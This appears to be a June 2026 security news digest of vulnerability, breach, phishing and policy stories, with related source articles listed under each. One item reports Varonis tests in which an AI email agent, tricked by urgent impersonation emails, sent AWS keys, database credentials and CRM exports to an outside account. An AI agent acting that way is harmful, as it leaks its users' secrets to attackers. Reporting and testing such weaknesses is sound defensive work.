This article is a direct report on the same event: WhatsApp says it detected and disrupted an NSO-linked spear-phishing campaign using malicious links, disabled related test accounts and groups, and is seeking a federal contempt order for violating the permanent injunction barring NSO from targeting WhatsApp users.
2026.06.08 100%
This article establishes a new trackable event: Meta's allegation of a fresh NSO-linked WhatsApp targeting campaign and its request that the court enforce the prior injunction through contempt proceedings.
Ivanti patches two critical Sentry flaws, including root remote-code-execution bug CVE-2026-10520
Zero-Days & CVEs, Urgent Patches, Technology & Software, Ivanti
Ivanti released emergency security updates for its Sentry mobile gateway after finding two critical flaws that could let attackers take over affected systems. The bugs are CVE-2026-10520, a maximum-severity OS command injection issue that can enable remote code execution as root, and CVE-2026-10523, an authentication bypass that can let unauthenticated attackers create rogue admin accounts. Fixes are in Sentry versions R10.5.2, R10.6.2, and R10.7.1; Ivanti said it has no evidence of active exploitation at disclosure.
Why it matters: Organizations using Ivanti Sentry should update immediately because these bugs could hand an attacker full control of a gateway that sits between mobile devices and internal corporate systems. Even without confirmed in-the-wild abuse yet, Ivanti edge and management products have a strong history of rapid post-disclosure exploitation.
Sources
2026.06.10 99%
This article reports the same Ivanti Sentry disclosure, adding patch urgency, affected fixed versions (10.5.2, 10.6.2, 10.7.1), and technical detail from watchTowr that CVE-2026-10520 involved an exposed Apache Tomcat API parsing attacker-controlled MICS configuration commands; it also reiterates CVE-2026-10523 as an unauthenticated admin-account creation flaw.
Ionut Arghire 2026.06.10 94%
This article adds that Ivanti released Sentry 10.5.2, 10.6.2, and 10.7.1 to fix CVE-2026-10520 and CVE-2026-10523, and also notes related EPMM fixes (CVE-2026-6973 and CVE-2026-10727). It reiterates that CVE-2026-10520 is a remote unauthenticated OS command injection leading to root code execution and that CVE-2026-10523 is a remote unauthenticated authentication bypass allowing creation of administrator accounts, with Ivanti saying it has no evidence of active exploitation.
Sergiu Gatlan 2026.06.10 100%
This article establishes a new tracked event: Ivanti's June 2026 disclosure and patching of CVE-2026-10520 and CVE-2026-10523 in Sentry, distinct from prior Ivanti EPMM and other zero-day stories.
Microsoft issues mitigations for YellowKey Windows BitLocker bypass zero-day tracked as CVE-2026-45585
Urgent Patches, Policy & Regulation, Zero-Days & CVEs, Surveillance & Privacy, Technology & Software, Consumers & General Public, Microsoft
Microsoft said it is tracking the publicly disclosed YellowKey Windows BitLocker security feature bypass as CVE-2026-45585 and published mitigations pending a security update. The flaw can allow access to BitLocker-protected drives by abusing specially crafted FsTx files and WinRE behavior; Microsoft recommends disabling autofstx.exe auto-start in WinRE and requiring BitLocker TPM+PIN startup authentication.
Why it matters: Organizations and users relying on BitLocker for device-at-rest protection may need to apply mitigations immediately because PoC details are public and a fix is not yet available. Defenders should review BitLocker startup settings and WinRE configuration now.
Sources
Sergiu Gatlan 2026.06.10 94%
This article updates the same YellowKey event by reporting that Microsoft has now patched CVE-2026-45585 as part of June 2026 Patch Tuesday, moving the story from mitigations-only to an available fix.
BrianKrebs 2026.06.09 41%
The article references the same YellowKey/BitLocker disclosure thread and notes Microsoft's June patching of a related BitLocker elevation-of-privilege issue, though the main event here is Patch Tuesday rather than the original YellowKey mitigation story.
Lawrence Abrams 2026.06.09 52%
This article reports Microsoft’s June Patch Tuesday fix for a separate publicly disclosed Windows BitLocker bypass flaw, CVE-2026-50507, adding another BitLocker zero-day-related development but not the same underlying vulnerability as YellowKey CVE-2026-45585.
Eduard Kovacs 2026.06.03 41%
YellowKey is one of the Nightmare Eclipse-disclosed flaws discussed here. The article adds context that YellowKey was part of a broader batch of publicly dumped Microsoft zero-days that triggered controversy and partial patching, but the main event is the broader disclosure backlash rather than a standalone YellowKey update.
Bruce Schneier 2026.06.02 57%
The post explicitly references the BitLocker-breaking exploit from the Nightmare Eclipse disclosures, adding context that Microsoft is threatening the researcher tied to the YellowKey zero-day case.
2026.05.28 80%
This article adds Microsoft’s broader response to the Nightmare Eclipse zero-day disclosures, reiterates that YellowKey (CVE-2026-45585) remains unpatched, says Microsoft considers exploitation more likely, and places YellowKey alongside five other publicly dumped Windows flaws in the same disclosure campaign.
Ionut Arghire 2026.05.20 99%
This article is directly about the same YellowKey event and adds specifics on Microsoft's mitigation steps, the CVE assignment (CVE-2026-45585), the WinRE/autofstx.exe behavior being blocked, and debate over whether BitLocker+PIN is also affected.
info@thehackernews.com (The Hacker News) 2026.05.20 99%
The article appears to cover the same underlying event: Microsoft's release of mitigations for the YellowKey BitLocker bypass vulnerability CVE-2026-45585.
Sergiu Gatlan 2026.05.20 100%
This article establishes a distinct tracked event by adding Microsoft's official CVE assignment and mitigation guidance for the YellowKey BitLocker zero-day, which is not represented in the existing story list.
Bruce Schneier 2026.05.18 88%
This is an early report on the same YellowKey BitLocker bypass event, noting public disclosure by Nightmare Eclipse and that the exploit reliably bypasses default Windows 11 BitLocker with physical access.
ServiceNow says attackers exploited an unauthenticated API flaw to access data in some customer instances
Zero-Days & CVEs, Breaches & Data Leaks, ServiceNow
ServiceNow told affected customers that attackers accessed data from some hosted customer instances through a flaw in an API endpoint. The company said it applied a security update on June 5, 2026 to require authentication for the affected endpoint, reportedly /api/now/related_list_edit/create, after detecting anomalous activity. ServiceNow has not yet assigned a CVE, and says the issue mainly affects customers on the Australia release or older releases with certain configuration changes.
Why it matters: Organizations using affected ServiceNow instances may have exposed sensitive ticket, employee, asset, and incident-response data, including credentials or tokens pasted into support workflows. This is urgent for affected customers: review logs and exposed records immediately, check for requests to the vulnerable endpoint, and rotate any secrets that may have been accessible.
Sources
Eduard Kovacs 2026.06.10 98%
This is the same underlying event: ServiceNow patched the flaw in hosted instances on June 5, said exploitation allowed unauthenticated users in some cases to gain greater access and query instance tables, noted affected customers were notified, and added detail that Australia platform release users or customers with specific configuration changes were affected. It also reports the company is still evaluating a CVE assignment and that some reports claim ServiceNow had known of the issue since April 7.
info@thehackernews.com (The Hacker News) 2026.06.10 99%
This article covers the same underlying event: exploitation of a ServiceNow flaw to gain unauthorized access to customer instances, reinforcing the incident details and affected scope already tracked.
Lawrence Abrams 2026.06.09 100%
This article appears to be the first concrete reporting of the ServiceNow incident, including exploitation details, affected release scope, the likely endpoint, and operational guidance for defenders.
Fortinet patches critical FortiSandbox bug CVE-2026-25089 that lets attackers run code without logging in
Urgent Patches, Zero-Days & CVEs, Technology & Software, Fortinet
Fortinet fixed a critical flaw in FortiSandbox that could let an attacker take over affected appliances over the internet without a password. The bug, CVE-2026-25089, is an OS command injection issue in the FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS web interface, exploitable via crafted HTTP requests for arbitrary command execution. Fixes shipped in FortiSandbox 5.0.6 and 4.4.9, FortiSandbox Cloud 5.0.6, and FortiSandbox PaaS 5.0.6; Fortinet also patched two medium-severity flaws in FortiOS, FortiProxy, and FortiPortal.
Why it matters: Organizations using FortiSandbox should update quickly because this is the kind of bug that can allow full remote compromise of a security appliance. Even though Fortinet says it has no evidence of attacks yet, internet-facing management interfaces are high-risk and should be patched or tightly restricted immediately.
Sources
Ionut Arghire 2026.06.10 100%
The article establishes a distinct Fortinet patch event centered on CVE-2026-25089 in FortiSandbox, which is not the same underlying event as any existing tracked story.
Anthropic says it plans broader release of Mythos-class AI bug-finding models after expanding restricted access to governments
Policy & Regulation, Surveillance & Privacy, Zero-Days & CVEs, Government, Technology & Software, Anthropic
Anthropic says it intends to eventually make Mythos-class vulnerability-finding artificial intelligence available more broadly, but for now is expanding its restricted Project Glasswing program to additional partners including U.S. and allied governments. The company says Mythos has scanned more than 1,000 open-source projects, estimated 6,202 high-or-critical-severity vulnerabilities and 23,019 total flaws, and validated many findings through coordinated disclosure; no CVE list or release date for public access was provided.
Why it matters: This matters because a powerful AI system for finding software flaws could help defenders patch faster, but could also accelerate criminal discovery of exploitable bugs if released without effective guardrails. Security teams should expect faster vulnerability discovery pressure in widely used open-source components and be prepared for heavier disclosure and patching volume.
Sources
Mayank Parmar 2026.06.10 89%
This article advances the same underlying event by reporting Anthropic's public rollout of Fable 5, a guarded version of the Mythos-class model, and adds concrete details on access limits, sensitive-query downgrading to Opus 4.8, temporary availability to Pro/Max/Enterprise users, and the distinction between restricted Mythos 5 and safeguarded Fable 5.
Eduard Kovacs 2026.06.09 84%
This article is a direct follow-up on that same underlying event: Anthropic has now launched Claude Fable 5 for general availability with cyber/bio fallbacks and says Project Glasswing partners are being upgraded from Mythos Preview to Mythos 5, adding concrete rollout details, guardrail design, pricing, and partner-access changes.
Ionut Arghire 2026.06.09 93%
This is a direct follow-up on the same Mythos program, adding concrete exploit-generation results: Anthropic says Mythos Preview produced working Firefox and Windows N-day exploits within hours, showing the model can weaponize disclosed flaws rather than only find bugs.
2026.06.03 86%
This article adds specific details on Anthropic's Project Glasswing expansion from about 50 to 200 partners across 15 countries, identifies new access dynamics affecting UK banks, and notes that ENISA will receive Mythos Preview access while CISA has not yet been selected.
2026.06.02 88%
This article directly updates the same Mythos / Project Glasswing event by adding that Anthropic expanded the preview program by about 150 organizations to roughly 200 total partners, and that Cisco used Mythos Preview and OpenAI's GPT 5.5-Cyber to scan 1.8 billion lines of Cisco code in eight weeks with a reported false-positive rate under 3 percent, though Cisco did not disclose the number of flaws found or fixed.
Eduard Kovacs 2026.06.02 96%
This is a direct update on the same underlying event: Anthropic broadening Mythos availability. The new reporting adds that Project Glasswing is expanding from about 50 to roughly 200 total partner organizations, that the new cohort includes critical-infrastructure entities and reportedly Okta, Samsung, ENISA, and NATO, and that Anthropic says Mythos has found more than 23,000 potential vulnerabilities with only 75 high/critical issues patched so far.
Mayank Parmar 2026.05.29 95%
This article directly updates the same underlying event by reporting Anthropic's confirmation that Mythos-class models are expected to roll out to all customers in the coming weeks, adding timing and reaffirming that prior restrictions were due to security risk concerns.
Mayank Parmar 2026.05.25 93%
This article adds specific evidence that Anthropic may be moving from restricted access toward product integration, citing Mythos references and a briefly exposed toggle in public Claude Code and Claude Security, plus new details on the Glasswing program and Anthropic's claim that Mythos found 10,000 high- or critical-severity vulnerabilities in its first month.
Eduard Kovacs 2026.05.25 91%
This is a direct update on the same underlying Mythos/Project Glasswing rollout, adding Anthropic's first large-scale outcome data: 23,000 potential flaws across 1,000+ open source projects, 1,726 externally confirmed findings, more than 1,000 high- or critical-severity issues, 75 severe issues already patched, and 65 advisories published.
2026.05.25 100%
This article establishes a new trackable development around Anthropic’s Mythos program by adding a concrete policy shift toward wider access, naming government expansion, and quantifying validated open-source vulnerability discovery at scale.
UK scales back planned telecom cybersecurity rules introduced after Salt Typhoon espionage campaign
Policy & Regulation, Threat Actors & APTs, Telecommunications, Government
The UK has weakened proposed telecom security requirements that were drafted after the China-linked Salt Typhoon spying campaign against telecom networks. Recorded Future News reports the government dropped or delayed several measures after industry objections, including a proposed independent signalling intrusion detection system meant to detect abuse of telecom signalling traffic. The updated code takes effect in mid-July unless Parliament blocks it, and operators can still be judged against it under existing telecom security duties.
Why it matters: This affects how well UK phone and internet providers may detect and contain state-backed intrusions into core communications networks. Telecom operators, regulators, and enterprise customers should review the final code now because the changes may leave weaker safeguards against the kinds of access used for large-scale espionage.
Sources
2026.06.09 100%
The article establishes a distinct UK policy story: the government’s rollback of telecom security measures specifically developed in response to Salt Typhoon-style telecom espionage.
HTTP/2 Bomb denial-of-service attack chain hits default NGINX, Apache, IIS, Envoy and Pingora web server setups
Zero-Days & CVEs, Urgent Patches, Technology & Software, NGINX, Apache, Microsoft, Envoy, Cloudflare
Researchers say a new HTTP/2 attack chain can knock major web servers offline within seconds, potentially affecting more than 880,000 websites using default configurations. The technique combines an HPACK header-compression bomb with Slowloris-style connection holding to exhaust memory; it builds on CVE-2016-6581, CVE-2016-8740, CVE-2016-1546, Apache's 2025 fix CVE-2025-53020, and newly assigned Apache CVE-2026-49975. NGINX reportedly fixed the issue in April, Apache in late May, while Microsoft IIS, Envoy, and Cloudflare Pingora had not yet been patched at publication.
Why it matters: Organizations running internet-facing HTTP/2 servers could be taken offline by a relatively low-resource attacker, so this is operationally urgent even though it is a denial-of-service issue rather than data theft. Admins should review vendor advisories, apply available fixes for NGINX and Apache, and add mitigations or rate-limiting for IIS, Envoy, and Pingora until patches arrive.
Sources
2026.06.09 63%
It ties Microsoft's June patch release to the previously disclosed HTTP/2 Bomb research by stating that Microsoft fixed CVE-2026-49160 in HTTP.sys and introduced a MaxHeadersCount registry mitigation for HTTP/2 and HTTP/3 requests.
Lawrence Abrams 2026.06.09 93%
This directly updates the HTTP/2 Bomb story by confirming Microsoft patched the related Windows HTTP.sys denial-of-service issue as CVE-2026-49160 and added a MaxHeadersCount mitigation setting and KB5102602 guidance.
2026.06.04 98%
This article is another report on the same HTTP/2 Bomb attack chain, adding details that OpenAI Codex helped Calif researchers chain older HPACK bomb and Slowloris-style techniques, and updating patch status for nginx, Apache, Envoy, Microsoft IIS, and Cloudflare Pingora.
Bill Toulas 2026.06.03 98%
This article is a direct report on the same HTTP/2 Bomb event, adding concrete exploitation results, affected versions, patch status, and the Apache CVE assignment (CVE-2026-49975), plus noting that nginx 1.29.8 fixes the issue while IIS, Envoy, and Pingora remain unpatched.
Ionut Arghire 2026.06.03 100%
This article appears to be the first report establishing the newly named HTTP/2 Bomb exploit chain, including affected products, CVE references, patch status, and public proof-of-concept details.
Public zero-day in VS Code and github.dev can steal GitHub tokens and expose private repositories
Zero-Days & CVEs, Urgent Patches, Supply Chain, Technology & Software, Microsoft, GitHub
A newly disclosed Visual Studio Code flaw can let attackers steal a victim’s GitHub sign-in token with a single click on a malicious link, potentially exposing all private repositories that account can access. Researcher Ammar Askar published proof-of-concept exploit code on June 3, 2026; no CVE has been assigned and no official patch is available. The bug abuses message passing between sandboxed webviews and the main editor in github.dev, allowing a malicious extension to be installed and extract a broad GitHub OAuth token.
Why it matters: Developers, maintainers, and employees who use github.dev or VS Code-linked GitHub workflows could have source code and other private repository data exposed before a fix is available. Until Microsoft and GitHub ship a patch, users should treat github.dev links cautiously and clear github.dev cookies/site data so unexpected extension sign-in prompts appear.
Sources
BrianKrebs 2026.06.09 53%
Krebs notes Microsoft also patched a zero-day in Visual Studio Code that can steal GitHub tokens, which appears to be the same underlying VS Code/github.dev token-theft flaw tracked separately.
2026.06.04 95%
This article is a direct update on that same VS Code/github.dev token-theft zero-day, adding that researcher Ammar Askar publicly released a working exploit, said he bypassed Microsoft’s reporting process, and that GitHub received about one hour’s notice before disclosure while Microsoft has not clarified crediting, CVE assignment, or exposure scope.
Eduard Kovacs 2026.06.04 99%
This article covers the same underlying event: Ammar Askar’s public disclosure of a one-click VS Code/github.dev zero-day that steals GitHub tokens via a malicious Jupyter notebook and extension install. It adds that Microsoft patched github.dev on June 3, notes the desktop VS Code path appears to remain unpatched, and reiterates the remote-code-execution risk on desktop.
2026.06.03 97%
This article is a direct report on the same underlying event: Ammar Askar's public disclosure of a VS Code/github.dev flaw that abuses Workspace Recommendations and a Jupyter Notebook Webview trick to auto-install a malicious extension and steal GitHub OAuth tokens. It adds detail on the disclosure timeline, Askar's decision to publish within an hour of notifying a GitHub contact, and his stated dispute with MSRC over prior VS Code vulnerability handling.
info@thehackernews.com (The Hacker News) 2026.06.03 96%
The article appears to cover the same underlying event: a one-click attack in GitHub Dev/github.dev related to VS Code that can steal full GitHub OAuth tokens and expose private repositories.
Sergiu Gatlan 2026.06.03 100%
This article appears to be the first major report establishing a distinct public zero-day affecting VS Code/github.dev, with exploit code and immediate defender action needed.
Varonis finds OpenClaw AI email agent can be phished into sending AWS keys, database credentials, and customer data
Social Engineering & Phishing, Surveillance & Privacy, Technology & Software, OpenClaw, Google, OpenAI, Amazon Web Services
Researchers found that an OpenClaw AI email agent could be tricked by phishing-style messages into leaking sensitive data instead of protecting it. In Varonis simulations, the open-source agent, connected to Gmail, browser tools, and Google Workspace APIs, sent AWS IAM keys, database credentials, SSH details, and CRM exports to an external account after urgent impersonation emails. The tests used Google Gemini 3.1 Pro and OpenAI GPT-5.4 and showed that URL and OAuth-app checks were stronger than sender-identity verification.
Why it matters: Organizations testing AI agents for email and workflow automation could accidentally give them access to data they can be manipulated into disclosing. Treat this as an immediate design and policy issue: limit agent privileges, block unapproved external sharing, require human approval for high-risk actions, and verify sender identity before deployment.
Sources
Bill Toulas 2026.06.09 100%
This article establishes a distinct security story about phishing and impersonation attacks against OpenClaw-based AI agents causing sensitive-data exposure in realistic enterprise workflows.
SAP fixes critical NetWeaver and Commerce flaws including NetWeaver SAML bug CVE-2026-44748
Zero-Days & CVEs | Urgent Patches | Technology & Software | Retail & E-Commerce | SAP
SAP released June 2026 security updates for critical flaws in NetWeaver, Commerce Cloud, and Data Hub that could let attackers access sensitive data, crash systems, or bypass normal protections. The most severe issues are CVE-2026-44748, an XML Signature Wrapping flaw in NetWeaver AS ABAP and ABAP Platform SAML authentication rated 9.9; CVE-2026-27671, a 9.8 memory-corruption bug in the SAP kernel's RFC handling affecting NetWeaver and ABAP Platform; CVE-2026-22732, a 9.1 Spring Security header-handling issue affecting Commerce Cloud and Data Hub; and CVE-2026-40128, a 9.0 directory traversal flaw in NetWeaver Application Server Java reachable through crafted HTTP logon requests.
Why it matters: SAP systems often sit at the core of large companies' business operations, so critical flaws in NetWeaver and Commerce can have broad operational and data-security impact. Organizations using affected SAP products should review SAP's June 2026 notes, apply patches promptly, and use temporary mitigations such as disabling SAML where needed until updates are installed.
Sources
Bill Toulas 2026.06.09 98%
This article is the same June 2026 SAP patch event and adds details on the full set of 15 fixes, highlighting four critical flaws including CVE-2026-44748 in NetWeaver, CVE-2026-27671 in ABAP, CVE-2026-22732 affecting Commerce Cloud and Data Hub, and CVE-2026-40128 in NetWeaver AS Java, plus two high-severity issues.
Ionut Arghire 2026.06.09 100%
This article establishes a new tracked story around SAP's June 2026 Patch Day release and the specific critical CVEs affecting NetWeaver, Commerce Cloud, and Data Hub.
Adobe patches 123 security flaws across Experience Manager, ColdFusion, Acrobat, Campaign Classic and other products
Urgent Patches | Zero-Days & CVEs | Technology & Software | Consumers & General Public | Adobe
Adobe released security updates fixing 123 vulnerabilities across 11 products, affecting organizations and users running Experience Manager, ColdFusion, Acrobat Reader and other Adobe software. The biggest group is 57 flaws in Adobe Experience Manager, while ColdFusion and Campaign Classic include the highest-priority issues, with two Campaign Classic remote-code-execution bugs rated CVSS 10. Adobe said it has no evidence of in-the-wild exploitation and did not list CVE IDs in this report, but marked the ColdFusion and Campaign Classic issues as priority 1, meaning exploitation is more likely.
Why it matters: Organizations using Adobe server products should review and apply these updates promptly, especially for ColdFusion and Campaign Classic, because remote-code-execution bugs can let attackers take over systems. End users should update Acrobat and Reader through normal patch channels.
Sources
Eduard Kovacs 2026.06.09 100%
This article establishes a distinct June 2026 Adobe patch cycle story covering a large set of vulnerabilities across multiple Adobe products, with especially important fixes in ColdFusion and Campaign Classic.
New Jersey police accused of assaulting journalists and denying press protections during Delaney Hall protest coverage
Surveillance & Privacy | Information Freedom | Government | Media & Entertainment | Consumers & General Public | New Jersey police | Delaney Hall
Press-freedom groups say federal and local law enforcement assaulted at least 40 journalists covering protests and a detainee hunger strike near the Delaney Hall immigration detention facility in Newark, New Jersey. The Freedom of the Press Foundation says New Jersey police appeared to decide on the spot who counted as a journalist and who did not, raising concerns about unlawful interference with newsgathering and First Amendment protections during protest reporting.
Why it matters: This matters to the public because it can limit independent reporting on police activity and protests, making it harder to know what is happening on the ground. Journalists, legal observers, and civil-liberties groups should watch for further incidents, preserve evidence, and track whether authorities change policy or face legal challenges.
Sources
Caitlin Vogus 2026.06.09 77%
This article adds specific reporting that journalists covering the Delaney Hall protests in Newark said police turned them away for carrying gas masks or bags needed to hold protective equipment, tying PPE restrictions directly to the same protest-policing environment already tracked in the Delaney Hall press-freedom story.
Freedom of the Press Foundation 2026.06.05 100%
This article establishes a distinct press-freedom story centered on alleged police assaults on reporters and ad hoc credentialing decisions during coverage of protests at Delaney Hall in Newark.
OpenSSL patches high-severity PKCS#7 verification flaw CVE-2026-45447 and 17 other vulnerabilities
Urgent Patches | Zero-Days & CVEs | Technology & Software | OpenSSL
OpenSSL released new versions to fix a high-severity bug that can crash applications and may allow remote code execution when they verify a specially crafted signed message. The main issue, CVE-2026-45447, is a heap use-after-free in PKCS7_verify() triggered by a malformed PKCS#7 or S/MIME SignedData digestAlgorithms field; OpenSSL also patched 17 other flaws ranging from low to moderate severity affecting certificate handling, encryption integrity, denial of service, and possible code execution paths.
Why it matters: OpenSSL is embedded in many servers, appliances, and applications, so this can affect far more systems than organizations realize. Teams should identify where OpenSSL is deployed and apply the new releases promptly, especially in products or services that process S/MIME or PKCS#7 signed content.
Sources
Eduard Kovacs 2026.06.09 100%
This article appears to be the first item here establishing the OpenSSL June 2026 patch event centered on CVE-2026-45447 and the broader batch of 18 fixed vulnerabilities.
Veeam patches critical Backup & Replication flaw CVE-2026-44963 that lets domain users run code on backup servers
Zero-Days & CVEs | Urgent Patches | Technology & Software | Veeam
Veeam released fixes for a critical flaw in its Backup & Replication software that could let a low-privilege domain user take over a backup server. The issue, CVE-2026-44963, affects Veeam Backup & Replication 12.3.2.4465 and all earlier version 12 builds when the backup server is joined to a Windows domain; it was fixed in version 12.3.2.4854, and Veeam says version 13.x is not affected due to architectural changes.
Why it matters: Backup servers are high-value targets because attackers and ransomware gangs use them to steal data and destroy recovery options. Organizations running affected Veeam versions should update immediately and review whether backup servers are unnecessarily joined to a domain.
Sources
info@thehackernews.com (The Hacker News) 2026.06.09 99%
This article appears to report the same Veeam Backup & Replication remote-code-execution issue, centered on CVE-2026-44963 and its impact on domain-joined environments, adding another source covering the same vendor patch and risk details.
Sergiu Gatlan 2026.06.09 100%
This article establishes a new story around Veeam's disclosure and patching of CVE-2026-44963, a newly reported critical RCE flaw affecting domain-joined Veeam Backup & Replication servers.
SiribClone uses fake romance and aid lures on Telegram to spy on Russian soldiers with SafeLoveStealer and SiribGrabber malware
Threat Actors & APTs | Malware | Social Engineering & Phishing | Defense & Aerospace | Technology & Software | Consumers & General Public | Telegram
Hackers posing as women seeking relationships or volunteers offering help tricked Russian military personnel into installing spyware or surrendering their Telegram accounts. Researchers at F6 say the previously undocumented SiribClone group has operated since at least summer 2025, targeting troops in border regions and combat zones with Android spyware dubbed SafeLoveStealer, desktop malware called SiribGrabber, and phishing sites masquerading as Telegram logins, invite pages, medical portals, and other services to steal messages, files, location data, and microphone audio.
Why it matters: This is an active espionage campaign aimed at people in combat zones and shows how romance lures and fake support offers can turn personal chats into battlefield surveillance. Anyone in sensitive roles should treat unsolicited Telegram contacts, app downloads, and login pages as high risk, avoid sideloading apps, and use phishing-resistant account protections where possible.
Sources
2026.06.09 100%
The article is the first concrete report here tying the SiribClone operation to specific lures, malware families, and Telegram account theft tactics against Russian military targets.
Group-IB links thousands of fake FIFA World Cup 2026 domains to fraud campaigns targeting ticket buyers
Social Engineering & Phishing | Scams & Fraud | Malware | Media & Entertainment | Hospitality & Travel | Consumers & General Public | FIFA | FBI
Researchers say multiple criminal groups have built fake FIFA websites to steal World Cup fans’ passwords, payment details, and money through bogus ticket sales. Group-IB identified four separate campaigns since August 2025, including a Chinese-speaking operation it calls GHOST STADIUM that uses more than 300 active lookalike domains and roughly 3,800 dormant ones. The phishing kit closely copies FIFA’s login flow, can trigger password-reset steps to lock victims out, and is being promoted through Facebook ads offering unrealistically cheap tickets.
Why it matters: Fans trying to buy 2026 World Cup tickets could lose their accounts, have legitimate tickets resold, or pay scammers for fake seats. Users should only type fifa.com directly into their browser, avoid ad-linked ticket offers, and treat lookalike FIFA domains as suspicious.
Sources
Arctic Wolf Labs 2026.06.09 84%
This is the same underlying World Cup 2026-themed fraud and phishing ecosystem, but adds materially new details: more than 10,000 themed domains since January 2026, a mobile-first funnel through WhatsApp/Telegram/Discord, a real-time adversary-in-the-middle phishing kit that defeats one-time MFA codes, a Windows infostealer delivered via ticket lures, and targeting of host-city staff and fake FIFA career portals aimed at Google Workspace accounts.
SecurityWeek News 2026.05.29 98%
This source reiterates Group-IB's findings on thousands of fraudulent FIFA-themed domains and adds detail that a Chinese-speaking group dubbed Ghost Stadium ran more than 300 domains, including a near-perfect clone of FIFA's site.
Bill Toulas 2026.05.28 95%
This article covers the same underlying World Cup 2026 fraud campaign ecosystem and adds an FBI public warning, example lookalike domains, fraud types beyond ticketing, and references to Group-IB's Ghost Stadium cluster and Bitdefender observations across multiple countries and ad channels.
2026.05.28 100%
This article establishes a distinct, named fraud operation and broader cluster of World Cup-themed phishing and ticket scams, with concrete infrastructure, tactics, and estimated victim impact.
UK orders Apple, Google and other device makers to add controls that block nude images for children
Policy & Regulation | Surveillance & Privacy | Government | Technology & Software | Consumers & General Public | Apple | Google | UK Home Office | Signal
The UK government says Apple, Google and other tech companies have three months to enable device-level controls on smartphones and tablets that detect and block nude images for children. The Home Office says the controls must work across apps and services by default and only be disabled through age assurance, with possible legislation, fines, and potential executive liability if companies do not comply. Officials also say adults would need age verification to access nude content on devices.
Why it matters: This is a major security-and-privacy policy development because it pushes on-device content scanning and age checks beyond individual apps into phones and tablets themselves. Device makers, app platforms, privacy advocates, parents, and UK users may all be affected, and companies now face a short deadline to respond or prepare for regulation.
Sources
2026.06.09 95%
This is a direct follow-up on the same UK child-safety device-scanning initiative, adding Signal's response that on-device scanning and age-verification requirements would weaken privacy, threaten encrypted messaging, and create infrastructure that could be repurposed for censorship and state surveillance.
2026.06.08 100%
This article appears to be the first concrete report here on the UK government's three-month demand for device-level nude-image blocking and age-assurance controls on smartphones and tablets.
French government says Tchap messaging service was breached through a hijacked user account
Surveillance & Privacy | Breaches & Data Leaks | Social Engineering & Phishing | Government | Education | Tchap | DINUM | ANSSI
France's government says an attacker got into Tchap, the encrypted messaging service used by public-sector workers, by taking over a valid user account. DINUM said ANSSI detected the intrusion on June 8 and blocked the compromised account, while investigators review logs to determine what conversations and data were accessed or stolen. A threat actor claimed the access came from social engineering on an education-related Tchap shard and alleged theft of 13.5GB of files, roughly 650,000 messages, and data on more than 73,000 accounts, plus a flaw allowing shared media files to be downloaded without a token.
Why it matters: This affects a government communications platform with more than 300,000 monthly users, so exposed chats, files, and account metadata could have broad public-sector impact. French agencies and users should treat the incident as potentially sensitive, review what was shared in public rooms, investigate account takeover paths, and reset or harden credentials where appropriate.
Sources
2026.06.09 98%
This article appears to cover the same Tchap incident and adds details that ANSSI detected suspicious activity on June 7, DINUM says only public chat rooms were exposed, CNIL was notified, and the alleged attacker claims much broader access including tens of thousands of accounts, hundreds of thousands of messages, and possible exposure via directory search.
Sergiu Gatlan 2026.06.09 100%
This article establishes a new tracked story by identifying a specific intrusion into France's Tchap government messaging platform, including the access method, affected service, and preliminary scope of potentially exposed data.
Check Point patches exploited VPN authentication-bypass zero-day CVE-2026-50751 tied to Qilin ransomware activity
Urgent Patches | Ransomware | Zero-Days & CVEs | Government | Technology & Software | Check Point | CISA
Check Point says attackers used a zero-day flaw to break into some of its VPN systems, and at least one confirmed follow-on intrusion was linked to the Qilin ransomware operation. The main issue, CVE-2026-50751, is an unauthenticated authentication-bypass bug affecting Remote Access VPN, Mobile Access / SSL VPN, and Spark gateways when configured with deprecated IKEv1, legacy clients, and no mandatory machine certificate; Check Point also disclosed CVE-2026-50752, an IKEv1 certificate-validation flaw that could enable man-in-the-middle attacks on site-to-site VPNs. Exploitation began May 7 and has hit a few dozen organizations globally.
Why it matters: Organizations using affected Check Point VPN setups could be exposed to break-ins without valid credentials, with ransomware risk if attackers get in. This is urgent: apply Check Point's updates immediately or disable IKEv1, require machine certificates, and follow the vendor's mitigations.
Sources
Ionut Arghire 2026.06.09 99%
This article is a direct report on the same underlying event, adding specifics that exploitation began on May 7, affected a few dozen targeted organizations globally, involved deprecated IKEv1 certificate-validation logic, and that CISA added CVE-2026-50751 to KEV with a June 11 federal patch deadline; it also notes a second flaw, CVE-2026-50752, enabling site-to-site VPN man-in-the-middle attacks but not observed exploited.
Sergiu Gatlan 2026.06.09 96%
This article is a direct update on the same CVE-2026-50751 zero-day, adding that CISA placed it in the KEV catalog and ordered U.S. federal agencies to patch by June 11 under BOD 22-01, while reiterating exploitation details and mitigations for affected Check Point Remote Access VPN, Mobile Access, and Spark deployments using IKEv1.
2026.06.08 98%
This article is a direct update on the same Check Point VPN zero-day event, adding that exploitation began as early as May 7, that attackers had about a month-long head start before the fix, that several dozen organizations were targeted globally, and that Check Point also disclosed a related second flaw, CVE-2026-50752, affecting IKEv1 site-to-site VPN certificate validation.
Sergiu Gatlan 2026.06.08 100%
This article establishes a new tracked event centered on Check Point's disclosure and patching of CVE-2026-50751 as an exploited zero-day, plus the attribution of at least one post-compromise case to a Qilin ransomware affiliate.
Another NHS trust says the Qilin attack on Synnovis exposed patient records two years after the breach
Breaches & Data Leaks | Ransomware | Healthcare | Synnovis | Mid and South Essex NHS Foundation Trust | NHS
Mid and South Essex NHS Foundation Trust says the 2024 Qilin ransomware attack on pathology provider Synnovis exposed about 2,380 records tied to specialist diagnostic testing, and the total may rise as records are matched to individual patients. The incident is the same long-running data theft and service-disruption event that hit NHS pathology services in southeast London on June 3, 2024; patient data was later published after failed extortion, and affected trusts are still identifying who must be notified.
Why it matters: This shows the fallout from a major healthcare ransomware breach is still growing years later, with more patients and hospitals discovering exposed records. Affected NHS organizations need to keep tracing exposed data and notifying people, while patients contacted about past diagnostic testing should treat breach notices seriously and watch for scams or misuse of their information.
Sources
2026.06.09 100%
The article establishes a trackable development in the Synnovis/Qilin NHS breach by adding a newly confirmed affected trust and record count, showing the incident's victim scope is still expanding.
EFF says Meta smart glasses app contains active facial-recognition code that can identify people from stored faceprints
Surveillance & Privacy | Technology & Software | Consumers & General Public | Meta
